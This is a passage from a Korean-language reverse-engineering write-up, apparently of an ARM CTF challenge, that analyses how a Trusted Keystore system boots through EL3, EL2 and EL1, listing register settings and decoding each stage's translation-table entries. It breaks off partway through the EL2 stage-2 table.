INFO: TEE SPSR: 1d3 NOTICE: TEE OS initialized [KERNEL] Starting user program … === Trusted Keystore === Command: 0 - Load key 1 - Save key cmd&gt; </code></pre><p>위 문구를 보고 동작을 나누면 다음과 같다.</p> <ul> <li>EL3 의 MMU 설정 및 활성화</li> <li>EL2 의 MMU(IPA) 설정 및 활성화</li> <li>TrustOS 설정</li> <li>EL0 User Program 실행</li> </ul> <h3 id="translation-overview">Translation Overview</h3> <p>EL3 에서 EL0 에서 사용되는 페이징 구조는 다음과 같다.<br> <img src="./images/arm_super_hexagon_translation.png" alt="arm_super_hexagon_translation.png"></p> <h3 id="el3">EL3</h3> <p>EL3 의 EntryPoint 는 bios.bin 의 <code>0x0000_0000</code> 에 위치한다.</p> <p>부팅을 할 떄 EL3 에서 하는 동작은 다음과 같다:</p> <ul> <li>EL3 레지스터 설정</li> <li>Exception Handler 설정</li> <li>UART 설정</li> <li>MMU 설정 <ul> <li>Translation Table 설정</li> <li>VA -&gt; IPA 설정</li> </ul> </li> <li>EL2 및 EL1 바이너리 복사</li> <li>EL2 로 넘어가면서 EL2 의 EntryPoint(<code>0x40100000</code>) 실행</li> </ul> <h4 id="el3-레지스터-설정">EL3 레지스터 설정</h4> <p>설정하는 레지스터는 다음과 같다:</p> <ul> <li><strong>SCTLR_EL3</strong>: 0x30C50830; EIS=1, EOS=1, A=1, SA=1, I=1 <ul> <li>EIS: The taking of an exception to EL3 is a context synchronizing event.</li> <li>EOS: An exception return from EL3 is a context synchronizing event</li> <li>A: Alignment fault checking is enabled when executing at EL3. All instructions that load or store one or more registers have an alignment check that the address being accessed is aligned to the size of the data element(s) being accessed. If this check fails it causes an Alignment fault, which is taken as a Data Abort exception.</li> <li>SA: if a load or store instruction executed at EL3 uses the SP as the base address and the SP is not aligned to a 16-byte boundary, then a SP alignment fault exception is generated. For more information, see &lsquo;SP alignment checking&rsquo;.</li> <li>I: This control has no effect on the Cacheability of instruction access to Normal memory from EL3. If the value of SCTLR_EL3.M is 0, instruction accesses from stage 1 of the EL3 translation regime are to Normal, Outer Shareable, Inner Write-Through, Outer Write-Through memory.</li> </ul> </li> <li><strong>SCR_EL3</strong>: 0x238; EA=1, TWE=1 <ul> <li>EA: When executing at any Exception level, External aborts and SError exceptions are taken to EL3.</li> <li>TWE: Any attempt to execute a WFE instruction at any Exception level lower than EL3 is trapped to EL3, if the instruction would otherwise have caused the PE to enter a low-power state and it is not trapped by <a href="https://developer.arm.com/documentation/ddi0601/2024-03/AArch32-Registers/SCTLR--System-Control-Register?lang=en">SCTLR</a>.nTWE, <a href="https://developer.arm.com/documentation/ddi0601/2024-03/AArch32-Registers/HCR--Hyp-Configuration-Register?lang=en">HCR</a>.TWE, <a href="https://developer.arm.com/documentation/ddi0601/2024-03/AArch64-Registers/SCTLR-EL1--System-Control-Register--EL1-?lang=en">SCTLR_EL1</a>.nTWE, <a href="https://developer.arm.com/documentation/ddi0601/2024-03/AArch64-Registers/SCTLR-EL2--System-Control-Register--EL2-?lang=en">SCTLR_EL2</a>.nTWE, or <a href="https://developer.arm.com/documentation/ddi0601/2024-03/AArch64-Registers/HCR-EL2--Hypervisor-Configuration-Register?lang=en">HCR_EL2</a>.TWE.</li> </ul> </li> <li><strong>MDCR_EL3</strong>: 0x18000; SDD=1, SPD32=0b10 <ul> <li>SDD: Debug exceptions, other than Breakpoint Instruction exceptions, are disabled from all Exception levels in Secure state.</li> <li>SPD32: Secure privileged debug disabled. Debug exceptions from Secure EL1 are disabled.</li> </ul> </li> <li><strong>DAIF</strong>: 0x160; D=1, I=1, F=1 <ul> <li>Debug, IRQ, FIQ 를 무시하고 SError 만 허용한다.</li> </ul> </li> <li><strong>CPTR_EL3</strong>: 0x00</li> <li><strong>SPSEL</strong>: 수시로 바뀜</li> </ul> <h4 id="exception-handler-설정">Exception Handler 설정</h4> <p>IVT 를 설정하는 레지스터인 <strong>VBAR_EL3</strong>는 <code>0x2000</code> 으로 설정된다. 해당 주소를 보면 총 16 개의 Exception Handler 가 존재한다.<br> 하지만 이 중 유의미한 동작을 하는 Handler 는 자신보다 낮은 EL 에서 발생하는 Synchronous Exception 을 처리하는 2 개의 Handler 밖에 없다. 그리고 이 2 개의 Handler 도 TrustOS 를 초기화하는 비슷한 동작을 수행한다.</p> <h4 id="mmu-설정">MMU 설정</h4> <p>여기서 설정하는 레지스터는 다음과 같다:</p> <ul> <li><strong>TCR_EL3</strong>: 0x100022; T0SZ=34, TBI=1 <ul> <li>T0SZ: The size offset of the memory region addressed by <a href="https://developer.arm.com/documentation/ddi0601/2024-03/AArch64-Registers/TTBR0-EL3--Translation-Table-Base-Register-0--EL3-?lang=en">TTBR0_EL3</a>. The region size is $2^{(64-\{T0SZ})}$ bytes.</li> <li>TBI: Top Byte ignored in the address calculation.</li> </ul> </li> <li><strong>MAIR_EL3</strong>: 0xDD440400 <ul> <li>Attr0=0x00; Device-nGnRnE</li> <li>Attr1=0x04; Device-nGnRE</li> <li>Attr2=0x44; Device-nGnRE, (If FEAT_XS is implemented) Normal Inner Non-cacheable, Outer Non-cacheable</li> <li>Attr3=0xDD; Unpredictable</li> </ul> </li> <li><strong>SCTLR_EL3</strong>: M |= 1 <ul> <li>M: EL3 stage 1 address translation enabled.</li> </ul> </li> <li><strong>TTBR0_EL3</strong>: 0xe203000 -&gt; <ul> <li>0x00: 0xE003003 (Entry: 0xE003000) -&gt; <ul> <li>0x0: 0x783</li> <li>0x1: 0x1783</li> <li>0x2: 0x2783</li> <li>0x3: 0 …</li> </ul> </li> <li>0x47: 0xE004003 … -&gt; 0</li> <li>0x48: 0xE04B003 (Entry: 0xE04B000) -&gt; <ul> <li>0x0: 0x40000009000703</li> <li>0x1: 0 …</li> </ul> </li> <li>0x6F: 0xE04C003 … -&gt; 0</li> <li>0x70: 0xE073003 (Entry: 0xE073000) -&gt; <ul> <li>0x0000: 0x4000000E000703</li> <li>0x0001: 0x4000000E001703</li> <li>0x0002: 0x4000000E002703</li> <li>…</li> <li>0x01FF: 0x4000000E203703</li> </ul> </li> <li>0x71: 0xE074003 (Entry: 0xE074000) -&gt; <ul> <li>0x0: 0x4000000E200703</li> <li>0x1: 0x4000000E201703</li> <li>0x2: 0x4000000E202703</li> <li>0x3: 0x4000000E203703</li> <li>0x4: 0 …</li> </ul> </li> <li>0xE075003 … 0xE202003-&gt; 0</li> </ul> </li> </ul> <p><code>T0SZ=34</code> 이기 때문에 OA 는 0~29 비트만 사용할 수 있다. 또한 <code>TCR_EL3.DS=0</code> 이고 <code>TCR_EL3.PS=0b000</code> 이기 때문에 32-bit OA 를 사용한다. 즉, Level 2 와 Level 3 만 사용한다. 따라서 두 번째로 나타나는 Entry 는 Page Entry 이다.<br> <img src="./images/arm_virtual_address_bits_meaning.png" alt="arm_virtual_address_bits_meaning.png"> 이 점을 생각하면서 테이블에 있는 Page Entry 를 해석하면 다음과 같다:</p> <ul> <li><code>0x00: 0xE003003 -&gt; 0xn783</code>: <ul> <li>1 번째 비트가 1 이므로 Page Entry 를 사용</li> <li>AF = 1</li> <li>SH[1:0] = 0b11</li> <li>AP = 0b10; PrivRead</li> <li>AttrIndx = 0</li> <li>IA = <code>0xn000</code> (<code>(0x00 &lt;&lt; 21) + (0xn &lt;&lt; 12)</code>) (0 &lt;= n &lt;= 2)</li> <li>OA = <code>0xn000</code> (0x00 &lt;= n &lt;= 2)</li> </ul> </li> <li><code>0x48: 0xE04B003 -&gt; 0x40000009000703</code>: <ul> <li>1 번째 비트가 1 이므로 Page Entry 를 사용</li> <li>AF = 1</li> <li>AP=0b00; PrivRead, PrivWrite</li> <li>SH[1:0] = 0b11</li> <li>XN = 1</li> <li>AttrIndx = 0</li> <li>IA = <code>0x9000000</code> (<code>(0x48 &lt;&lt; 21) + (0x0 &lt;&lt; 12)</code>)</li> <li>OA = <code>0x9000000</code></li> </ul> </li> <li><code>0x70: 0xE073003 -&gt; 0x4000000Ennn703</code>: <ul> <li>1 번째 비트가 1 이므로 Page Entry 를 사용</li> <li>AF = 1</li> <li>AP = 0b00; PrivRead, PrivWrite</li> <li>SH[1:0] = 0b11</li> <li>XN = 1</li> <li>AttrIndx = 0</li> <li>IA = <code>0xEnnn000</code> (<code>(0x70 &lt;&lt; 21) + (0xnnn &lt;&lt; 12)</code>) (0 &lt;= nnn &lt;= 0x01FFF)</li> <li>OA = <code>0xEnnn000</code></li> </ul> </li> <li><code>0x71: 0xE074003 -&gt; 0x4000000E20n703</code>: <ul> <li>1 번째 비트가 1 이므로 Page Entry 를 사용</li> <li>AF = 1</li> <li>AP = 0b00; PrivRead, PrivWrite</li> <li>SH[1:0] = 0b11</li> <li>XN = 1</li> <li>AttrIndx = 0</li> <li>IA = <code>0xE20n000</code> (<code>(0x71 &lt;&lt; 21) + (0xn &lt;&lt; 12)</code>) (0 &lt;= n &lt;= 3)</li> <li>OA = <code>0xE20n000</code></li> </ul> </li> </ul> <h4 id="el2-및-el1-바이너리-복사">EL2 및 EL1 바이너리 복사</h4> <p>EL2 의 코드 영역을 0x40100000 에 복사하고 EL1 의 코드 영역 (Translation Table 포함) 을 0x40000000 에 복사한다.<br> 그 외에도 TEE 와 관련된 데이터를 0xE000000 와 0xE400000(TEE PC) 에 복사한다. 참고로 TrustZone 을 실행할 때 <code>SPSR=0x1d3</code> 이기 때문에 <code>nRW=1</code> 이다. 따라서 TrustZone 은 AArch32 로 동작한다.</p> <h4 id="el2-로-넘어가면서-el2-의-entrypoint-실행">EL2 로 넘어가면서 EL2 의 EntryPoint 실행</h4> <p>이 때 설정하는 레지스터는 다음과 같다:</p> <ul> <li><strong>SCR_EL3</strong>: 0x731; HCE=1, NS=1, SIF=1, RW=1 <ul> <li>HCE: The <code>HVC</code> instruction is enabled at EL1, EL2 or EL3.</li> <li>EL0 and EL1 are in Non-secure state, memory accesses from those exception levels cannot access Secure memory.</li> <li>SIF: Secure state instruction fetches from Non-secure memory are not permitted.</li> <li>RW: The next lower level is AArch64.</li> </ul> </li> </ul> <p>그리고 EL2 로 넘어가면서 EntryPoint 를 실행하기 위해 설정하는 레지스터는 다음과 같다:</p> <ul> <li><strong>SPSR_EL3</strong>: 0x3c9; D=1, A=1, I=1, F=1, EL2</li> <li><strong>ELR_EL3</strong>: 0x40100000</li> </ul> <p>그리고 <code>ERET</code> 을 통해 EL2 의 EntryPoint 를 실행한다.</p> <h3 id="el2">EL2</h3> <p>EL2 의 Entry Point 는 bios.bin 의 <code>0x0001_0000</code> 에 위치한다. 메모리에 로드되면 <code>0x40100000</code> 에 위치한다.<br> 부팅을 할 때 EL2 에서 수행하는 동작은 다음과 같다:</p> <ul> <li>EL2 레지스터 설정</li> <li>Exception Handler 설정</li> <li>UART 설정</li> <li>MMU 설정 <ul> <li>Translation Table 설정</li> <li>VA -&gt; IPA 설정</li> </ul> </li> <li>EL1 으로 넘어가면서 EL1 의 EntryPoint(EL1_VA:<code>0x00</code> = PA:<code>0x40000000</code>) 실행</li> </ul> <h4 id="el2-레지스터-설정">EL2 레지스터 설정</h4> <p>EL2 에서 설정하는 레지스터는 다음과 같다:</p> <ul> <li><strong>CPACR_EL1</strong>: 0x300000; FPEN=0b11 <ul> <li>FPEN: 하위 권한이 EL2 의 SIMD 에 접근할 때 Trap 을 발생시키지 않는다.</li> </ul> </li> <li><strong>SPSEL</strong>: 수시로 바뀜</li> </ul> <h4 id="exception-handler-설정-1">Exception Handler 설정</h4> <p>IVT 를 설정하는 레지스터인 <code>VBAR_EL2</code> 는 0x40101800 로 설정된다. 이 곳에는 <code>Lower EL using AArch64 Synchronous Exception</code> 을 제외한 다른 예외는 아무런 동작을 하지 않게 설정되어 있다.</p> <p><code>Lower EL using AArch64 Synchronous Exception</code> 에서는 <code>ESR_EL2.EC</code> 에 따라서 두 가지 동작을 수행한다:</p> <ul> <li><code>ESR_EL2.EC == 0x16</code>: EL2 의 권한으로 Translation Table 의 Entry 를 변경한다</li> <li><code>ESR_EL2.EC == 0x17</code>: <code>SMC 0x00</code> 을 통해 EL3 Exception 을 발생시켜 TEE-OS 를 초기화한다.</li> </ul> <h4 id="mmu-설정-1">MMU 설정</h4> <p>여기서 설정하는 레지스터는 다음과 같다:</p> <ul> <li><strong>VTCR_EL2</strong>: 0x80000027; T0SZ=39, DS=0, PS=0b000</li> <li><strong>VTTBR_EL2</strong>: 0x40106000 -&gt; <ul> <li><code>0x00: 0x40107003</code> (Descriptor Entry: 0x40107000) -&gt; <ul> <li><code>0x00: 0x40000443</code> (Page Entry)</li> <li><code>0x01: 0x40001443</code> (Page Entry)</li> <li>…</li> <li><code>0x0B: 0x4000B443</code> (Page Entry)</li> <li><code>0x0C: 0x4000004000C4C3</code> (Page Entry)</li> <li><code>0x0D: 0x4000004000D4C3</code> (Page Entry)</li> <li>…</li> <li><code>0x3A: 0x4000004003A4C3</code> (Page Entry)</li> <li><code>0x3B: 0x400000090004C3</code> (Page Entry)</li> <li><code>0x3C: 0 …</code></li> </ul> </li> <li><code>0x08: 0 …</code></li> </ul> </li> </ul> <p>여기서 <code>V~_EL2</code> 라는 것은 EL1 과 EL0 의 IPA 를 설정하는 것이다. 즉 이 설정으로 인해 EL2 에서 Translation 이 발생하지는 않는다.<br> <img src="./images/arm_address_space_in_armb8-a.png" alt="arm_address_space_in_armb8-a.png"></p> <p><code>VTCR_EL2.T0SZ=39</code> 이기 때문에 VA 는 0~24 비트만 사용할 수 있다. 그리고 <code>VTCR_EL2.PS=0b000</code> 이기 때문에 32bit OA 를 사용한다. 즉, Level 2 와 Level 3 만 사용한다. 따라서 두 번째로 나타나는 Entry 는 Page Entry 이다.<br> <img src="./images/arm_virtual_address_bits_meaning.png" alt="arm_virtual_address_bits_meaning.png"> 이 점을 생각하면서 테이블에 있는 Page Entry 를 해석하면 다음과 같다:</p> <ul> <li><code>0x00: 0x40107003</code> (Descriptor Entry: 0x40107000) -&gt; <ul> <li><code>0x00: 0x40000443</code> ~ <code>0x0B: 0x4000B443</code>: <ul> <li>1 번째 비트가 1 이므로 Page Entry 를 사용</li> <li>AF = 1</li> <li>S2AP = 0b01; EL0&amp;EL1 can read this memory</li> <li>IPA = <code>0xn000</code> (<code>(0x00 &lt;&lt; 21) + (0xn &lt;&lt; 12)</code>) (0x00 &lt;= n &lt; 0x0C)</li> <li>OA = <code>0x4000n000</code></li> </ul> </li> <li><code>0x0C: 0x4000004000C4C3</code> ~ <code>0x3A: 0x4000004003A4C3</code>: <ul> <li>1 번째 비트가 1 이므로 Page Entry 를 사용</li> <li>NX = 1 (FEAT_XNX is not implemented)</li> <li>AF = 1</li> <li>S2AP = 0b11; EL0&amp;EL1 can read and write this memory</li> <li>IPA = <code>0x0nn000</code> (<code>(0x00 &lt;&lt; 21) + (0xnn &lt;&lt; 12)</code>) (0x0C &lt;= nn &lt; 0x3B)</li> <li>OA = <code>0x400nn000</code></li> </ul> </li> <li><code>0x3B: 0x400000090004C3</code> <ul> <li>1 번째 비트가 1 이므로 Page Entry 를 사용</li> <li>NX = 1 (FEAT_XNX is not implemented)</li> <li>AF = 1</li> <li>S2AP = 0b11; EL0&amp;EL1 can read and write this memory</li> <li>IPA = <code>0x03B000</code> (<code>(0x00 &lt;&lt; 21) + ((0x3B) &lt;&lt; 12)</code>)</li> <li>OA = <code>0x9000000</code></li> </ul> </li> </ul> </li> </ul> <h4 id="el1-으로-넘어가면서-el1-의-entrypoint-실행">EL1 으로 넘어가면서 EL1 의 EntryPoint 실행</h4> <p>이때 설정하는 레지스터는 다음과 같다:</p> <ul> <li><strong>HCR_EL2</strong>: 0xc4080001; RW=1, TRVM=1, TVM=1, TSC=1, VM=1 <ul> <li>RW: EL1 is AArch64. EL0 is determined by the register width described in the current processing state when executing at EL0.</li> <li>TRVM: Non-secure EL1 reads are trapped to EL2.</li> <li>TVM: DC ZVA instruction is trapped to EL2 when executed in Non-secure EL1 or EL0.</li> <li>TSC: <code>SMC</code> instruction executed in Non-secure EL1 is trapped to EL2 for AArch32 and AArch64 Execution states.</li> <li>VM: Enables second stage translation for execution in Non-secure EL1 and EL0.</li> </ul> </li> </ul> <p>그리고 EL1 으로 넘어가기 위해 사용하는 레지스터는 다음과 같다:</p> <ul> <li><strong>SPSR_EL2</strong>: 0x3c5; E=1, A=1, I=1, F=1, EL1</li> <li><strong>ELR_EL2</strong>: VA:0x00 (PA:0x40000000)</li> </ul> <p>그리고 <code>ERET</code> 을 통해 EL1 의 EntryPoint 를 실행한다.</p> <h3 id="el1">EL1</h3> <p>EL1 의 EntryPoint 는 bios.bin 의 <code>0x000B_0000</code> 에 위치한다. 메모리에 로드되면 EL1_VA:<code>0x00</code>(= PA:<code>0x40000000</code>) 에 위치한다.</p> <p>부팅을 할 때 EL1 에서 수행하는 동작은 다음과 같다:</p> <ul> <li>레지스터 설정</li> <li>MMU 설정</li> <li>Exception Handler 설정 (Main Routine 에서)</li> <li>Main Routine 호출</li> <li>SMC 호출 (Main Routine 에서)</li> <li>EL0 호출 (Main Routine 에서)</li> </ul> <h4 id="레지스터-설정">레지스터 설정</h4> <p>EL1 의 EntryPoint 에서 설정하는 레지스터는 다음과 같다:</p> <ul> <li><strong>TCR_EL1</strong>: 0x6080100010; TBI1=1, TBI0=1, TG1=0b10, T1SZ=0x10, T0SZ=0x10 <ul> <li>TBI&lt;n&gt;: Top Byte Ignored for TTBR&lt;n&gt;_EL1</li> <li>TG&lt;n&gt;: Granule size for the TTBR&lt;n&gt;_EL1</li> <li>T&lt;n&gt;SZ: The size offset of the memory region addressed by TTBR&lt;n&gt;_EL1</li> </ul> </li> <li><strong>SCTLR_EL1</strong>: 0x30d00801; LSMAOE=1, nTLSMD=1, SPAN=1, EIS=1, TSCXT=1, EOS=1, M=1</li> <li><strong>SPSEL</strong>: 수시로 바뀜</li> </ul> <h4 id="mmu-설정-2">MMU 설정</h4> <ul> <li><strong>TTBR0_EL1</strong>: 0x1000 -&gt; <ul> <li><code>0x00: 0x2003</code> -&gt; <ul> <li><code>0x00: 0x3003</code> -&gt; <ul> <li><code>0x00: 0x401</code></li> <li><code>0x01: 0 …</code></li> </ul> </li> <li><code>0x01:0 …</code></li> </ul> </li> <li><code>0x01: 0 …</code></li> </ul> </li> <li><strong>TTBR1_EL1</strong>: 0x4000 -&gt; <ul> <li><code>0x0000: 0 … </code></li> <li><code>0x01FF:0x5003</code> -&gt; <ul> <li><code>0x0000: 0 …</code></li> <li><code>0x01FF:0x6003</code> -&gt; <ul> <li><code>0x00: 0x401</code></li> <li><code>0x01: 0 …</code></li> <li><code>0x07: 0x7003</code> -&gt; <ul> <li><code>0x0000: 0 …</code></li> <li><code>0x01FF: 0x3b403</code></li> </ul> </li> <li><code>0x08: 0 …</code></li> </ul> </li> </ul> </li> </ul> </li> </ul> <p>TCR_EL1.T1SZ = TCR_EL1.T0SZ = 16 인 것을 생각하면서 위 테이블을 해석하면 다음과 같다.<br> <img src="./images/arm_aarch64_ttbr_boundaries_and_va_ranges.png" alt="arm_aarch64_ttbr_boundaries_and_va_ranges.png"></p> <ul> <li><strong>TTBR0_EL1</strong> -&gt; <ul> <li><code>0x00: 0x2003</code> -&gt; <ul> <li><code>0x00: 0x3003</code> -&gt; <ul> <li><code>0x00: 0x401</code> <ul> <li>2MB Block</li> <li>AF = 1</li> <li>IA = <code>0x0000</code></li> <li>IPA = <code>0x0000</code></li> </ul> </li> <li><code>0x01: 0 …</code></li> </ul> </li> <li><code>0x01:0 …</code></li> </ul> </li> <li><code>0x01: 0 …</code></li> </ul> </li> <li><strong>TTBR1_EL1</strong> -&gt; <ul> <li><code>0x0000: 0 … </code></li> <li><code>0x01FF:0x5003</code> -&gt; <ul> <li><code>0x0000: 0 …</code></li> <li><code>0x01FF:0x6003</code> -&gt; <ul> <li><code>0x00: 0x401</code> <ul> <li>2MB Block</li> <li>AF = 1</li> <li>IA = <code>0xFFFFFFFFC0000000</code> (<code>(0xFFFF &lt;&lt; 48) + (0x1FF &lt;&lt; 39) + (0x1FF &lt;&lt; 30)</code>)</li> <li>IPA = <code>0x0000</code></li> </ul> </li> <li><code>0x01: 0 …</code></li> <li><code>0x07: 0x7003</code> -&gt; <ul> <li><code>0x0000: 0 …</code></li> <li><code>0x01FF: 0x3b403</code> <ul> <li>4KB Page</li> <li>AF = 1</li> <li>IA = <code>0xFFFFFFFFC0FFF000</code> (<code>(0xFFFF &lt;&lt; 48) + (0x1FF &lt;&lt; 39) + (0x1FF &lt;&lt; 30) + (0x7 &lt;&lt; 21) + (0x1FF &lt;&lt; 12)</code>)</li> <li>IPA = <code>0x3B000</code></li> </ul> </li> </ul> </li> <li><code>0x08: 0 …</code></li> </ul> </li> </ul> </li> </ul> </li> </ul> <h4 id="main-routine-호출">Main Routine 호출</h4> <p>VA:<code>0xFFFFFFFFC0008000</code>(-&gt; IPA:<code>0x8000</code> -&gt; PA:<code>0x40008000</code>; EL1_MainRoutine) 을 단순히 <code>BR</code> 로 호출한다.</p> <p>EL1 의 MainRoutine 는 bios.bin 의 <code>0x000B_8000</code> 에 위치한다. 메모리에 로드되면 EL1_VA:<code>0xFFFFFFFFC0008000</code>(= PA:<code>0x40008000</code>) 에 위치한다.</p> <h5 id="exception-handler-설정-2">Exception Handler 설정</h5> <ul> <li><strong>VBAR_EL1</strong>: 0xffffffffc000a000 <ul> <li>VA:<code>0xFFFFFFFFC000A000</code> = IPA:<code>0xA000</code> = PA:<code>0x4000A000</code><br> 다른 EL 과 마찬가지로 대부분의 핸들러는 별다른 동작을 하지 않으며 낮은 EL 에서 발생하는 Synchronous Exception 만 처리한다.</li> </ul> </li> </ul> <p>해당 Synchronous Exception 에서 System Call 들을 정의하고 있으며 존재하는 Syscall 들은 다음과 같다:</p> <ul> <li>read</li> <li>write</li> <li>mmap</li> <li>mprotect</li> <li>exit<br> 여기서 mmap 과 mprotect 는 ttbr0_el1 의 entry 를 수정하고 hvc 를 통해 vttbr0_el2 를 수정한다.</li> </ul> <p>그리고 secure call 도 정의되어 있다:</p> <ul> <li>tc_init_trustlet</li> <li>tc_register_wsm</li> <li>tc_tci_call<br> 이 secure call 들은 smc 를 호출한다.</li> </ul> <h5 id="mmu-설정-3">MMU 설정</h5> <ul> <li><strong>TTBR0_EL1</strong>: 0x20000 -&gt; <ul> <li><code>0x0000: 0x21003</code> -&gt; <ul> <li><code>0x00: 0x22003</code> -&gt; <ul> <li><code>0x00: 0 …</code></li> <li><code>0x02: 0x23003</code> -&gt; <ul> <li><code>0x00: 0x2000000002C4C3</code></li> <li><code>0x01: 0x2000000002D4C3</code></li> <li><code>0x02: 0x2000000002E4C3</code></li> <li><code>0x03: 0 …</code></li> <li><code>0x12: 0x6000000002F443</code></li> <li><code>0x13: 0…</code></li> </ul> </li> <li><code>0x03: 0 …</code></li> </ul> </li> <li><code>0x01: 0 …</code></li> </ul> </li> <li><code>0x0001: 0 …</code></li> <li><code>0x00FF: 0x24003</code> -&gt; <ul> <li><code>0x0000: 0 …</code></li> <li><code>0x01FD: 0x25003</code> -&gt; <ul> <li><code>0x0000: 0 …</code></li> <li><code>0x01FF: 0x26003</code> -&gt; <ul> <li><code>0x0000: 0 …</code></li> <li><code>0x01FE: 0x60000000030443</code></li> <li><code>0x01FF: 0x60000000031443</code></li> </ul> </li> </ul> </li> </ul> </li> <li><code>0x0100: 0 …</code></li> </ul> </li> <li><strong>TTBR1_EL1</strong>: 0x1B000 -&gt; <ul> <li><code>0x000: 0 …</code></li> <li><code>0x01FF: 0x1C003</code> -&gt; <ul> <li><code>0x000: 0 …</code></li> <li><code>0x01FF: 0x1D003</code> -&gt; <ul> <li><code>0x00: 0x1E003</code> -&gt; <ul> <li><code>0x00: 0x40000000000483</code></li> <li><code>0x01: 0x40000000001483</code></li> <li>…</li> <li><code>0x0A: 0x4000000000A483</code></li> <li><code>0x0B: 0</code></li> <li><code>0x0C: 0x6000000000C403</code></li> <li><code>0x0D: 0x6000000000D403</code></li> <li>…</li> <li><code>0x3A: 0x6000000003A403</code></li> <li><code>0x3B: 0 …</code></li> </ul> </li> <li><code>0x01: 0 …</code></li> <li><code>0x48: 0x1F003</code> -&gt; <ul> <li><code>0x00: 0x6000000003b403</code></li> <li><code>0x01: 0 …</code></li> </ul> </li> </ul> </li> </ul> </li> </ul> </li> </ul> <p>마찬가지로 TCR_EL1.T1SZ = TCR_EL1.T0SZ = 16 인 것을 생각하면서 위 테이블을 해석하면 다음과 같다.<br> <img src="./images/arm_aarch64_ttbr_boundaries_and_va_ranges.png" alt="arm_aarch64_ttbr_boundaries_and_va_ranges.png"></p> <ul> <li><strong>TTBR0_EL1</strong> -&gt; <ul> <li><code>0x0000: 0x21003</code> -&gt; <ul> <li><code>0x00: 0x22003</code> -&gt; <ul> <li><code>0x00: 0 …</code></li> <li><code>0x02: 0x23003</code> -&gt; <ul> <li><code>0x00: 0x2000000002C4C3</code> - <code>0x02: 0x2000000002E4C3</code> <ul> <li>PXN = 1</li> <li>AF = 1</li> <li>AP = 0b11; PrivRead, UnprivRead</li> <li>IA: <code>0x40n000</code> (<code>(0 &lt;&lt; 39) + (0 &lt;&lt; 30) + (0x02 &lt;&lt; 21) + (n &lt;&lt; 12)</code>) (0x00 &lt;= n &lt;= 0x02)</li> <li>IPA: <code>0x2n000</code> (0xC &lt;= n &lt;= 0xE)</li> </ul> </li> <li><code>0x03: 0 …</code></li> <li><code>0x12: 0x6000000002F443</code> <ul> <li>UXN = 1</li> <li>PXN or PIIndex[2] = 1</li> <li>AF = 1</li> <li>AP = 0b01; PrivRead, PrivWrite, UnprivRead, UnprivWrite</li> <li>IA: <code>0x412000</code> (<code>(0 &lt;&lt; 39) + (0 &lt;&lt; 30) + (0x02 &lt;&lt; 21) + (0x12 &lt;&lt; 12)</code>)</li> <li>IPA: <code>0x2F000</code></li> </ul> </li> <li><code>0x13: 0…</code></li> </ul> </li> <li><code>0x03: 0 …</code></li> </ul> </li> <li><code>0x01: 0 …</code></li> </ul> </li> <li><code>0x0001: 0 …</code></li> <li><code>0x00FF: 0x24003</code> -&gt; <ul> <li><code>0x0000: 0 …</code></li> <li><code>0x01FD: 0x25003</code> -&gt; <ul> <li><code>0x0000: 0 …</code></li> <li><code>0x01FF: 0x26003</code> -&gt; <ul> <li><code>0x0000: 0 …</code></li> <li><code>0x01FE: 0x60000000030443</code> - <code>0x01FF: 0x60000000031443</code> <ul> <li>UXN = 1</li> <li>PXN = 1</li> <li>AF = 1</li> <li>AP = 0b01; PrivRead, PrivWrite, UnprivRead, UnprivWrite</li> <li>IA: <code>0x7FFF7FFFE000</code> - <code>0x7FFF7FFFF000</code> (<code>(0xFF &lt;&lt; 39) + (0x1FD &lt;&lt; 30) + (0x1FF &lt;&lt; 21) + (n &lt;&lt; 12)</code>) (0x1FE &lt;= n &lt;= 0x1FF)</li> <li>IPA: <code>0x3n000</code> (0 &lt;= n &lt;= 1)</li> </ul> </li> </ul> </li> </ul> </li> </ul> </li> <li><code>0x0100: 0 …</code></li> </ul> </li> <li><strong>TTBR1_EL1</strong> -&gt; <ul> <li><code>0x000: 0 …</code></li> <li><code>0x01FF: 0x1C003</code> -&gt; <ul> <li><code>0x000: 0 …</code></li> <li><code>0x01FF: 0x1D003</code> -&gt; <ul> <li><code>0x00: 0x1E003</code> -&gt; <ul> <li><code>0x00: 0x40000000000483</code> - <code>0x0A: 0x4000000000A483</code> <ul> <li>UXN = 1</li> <li>AF = 1</li> <li>AP = 0b10; PrivRead</li> <li>IA: <code>0xFFFFFFFFC000n000</code> (<code>(0xFFFF &lt;&lt; 48) + (0x1FF &lt;&lt; 39) + (0x1FF &lt;&lt; 30) + (0 &lt;&lt; 21) + (n &lt;&lt; 12)</code>) (0 &lt;= n &lt;= A)</li> <li>IPA: <code>0xn000</code> (0 &lt;= n &lt;= A)</li> </ul> </li> <li><code>0x0B: 0</code></li> <li><code>0x0C: 0x6000000000C403</code> - <code>0x3A: 0x6000000003A403</code> <ul> <li>UXN = 1</li> <li>PXN = 1</li> <li>AF = 1</li> <li>AP = 0b00; PrivRead, PrivWrite</li> <li>IA: <code>0xFFFFFFFFC00nn000</code> (<code>(0xFFFF &lt;&lt; 48) + (0x1FF &lt;&lt; 39) + (0x1FF &lt;&lt; 30) + (0 &lt;&lt; 21) + (n &lt;&lt; 12)</code>) (0x0C &lt;= n &lt;= 0x3A)</li> <li>IPA: <code>0xnn000</code> (0x0C &lt;= nn &lt;= 0x3A)</li> </ul> </li> <li><code>0x3B: 0 …</code></li> </ul> </li> <li><code>0x01: 0 …</code></li> <li><code>0x48: 0x1F003</code> -&gt; <ul> <li><code>0x00: 0x6000000003B403</code> <ul> <li>UXN = 1</li> <li>PXN = 1</li> <li>AF = 1</li> <li>AP = 0b00; PrivRead, PrivWrite</li> <li>IA: <code>0xFFFFFFFFC9000000</code> (<code>(0xFFFF &lt;&lt; 48) + (0x1FF &lt;&lt; 39) + (0x1FF &lt;&lt; 30) + (0x48 &lt;&lt; 21) + (0 &lt;&lt; 12)</code>)</li> <li>IPA: <code>0x3B000</code></li> </ul> </li> <li><code>0x01: 0 …</code></li> </ul> </li> </ul> </li> </ul> </li> </ul> </li> </ul> <p>그리고 EL2 의 Exception 을 호출하여 EL2 의 Transltaion Table Entry 를 변경한다:</p> <ul> <li><strong>VTTBR_EL2</strong>: 0x40106000 -&gt; <ul> <li><code>0x00: 0x40107003</code> (Descriptor Entry: 0x40107000) -&gt; <ul> <li><code>0x00: 0x40000443</code> (기존과 동일)</li> <li><code>0x01: 0x40001443</code> (기존과 동일)</li> <li>…</li> <li><code>0x0B: 0x4000B443</code> (기존과 동일)</li> <li><code>0x0C: 0x4000004000C4C3</code> (기존과 동일)</li> <li><code>0x0D: 0x4000004000D4C3</code> (기존과 동일)</li> 